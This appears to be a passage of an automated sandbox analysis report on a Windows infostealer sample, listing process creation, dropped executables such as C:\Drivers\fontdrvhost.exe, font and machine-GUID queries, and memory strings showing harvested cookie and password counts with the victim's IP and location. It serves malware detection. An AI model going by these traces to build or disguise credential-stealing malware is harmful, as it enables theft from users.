                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe "C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`%
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.000000000286E000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"15","Cookies Domains (e9db)":"","Passwords Domains (e9db)":""},"5.0.1",5,1,"NEWORK PC","user","571345","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Drivers","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: kies Domains (e9db)":"","Passwords Domains (e9db)":""},"5.0.1",5,1,"NEWORK PC","user","571345","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Drivers","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FBF654 cpuid 0_2_00FBF654
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00FBAF0F
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Drivers\fontdrvhost.exe VolumeInformationJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeQueries volume information: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe VolumeInformationJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeQueries volume information: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Drivers\fontdrvhost.exe VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Drivers\fontdrvhost.exe VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeQueries volume information: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FBDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00FBDF1E
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FAB146 GetVersionExW,0_2_00FAB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Source: Yara matchFile source: 0000001A.00000002.2900490513.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
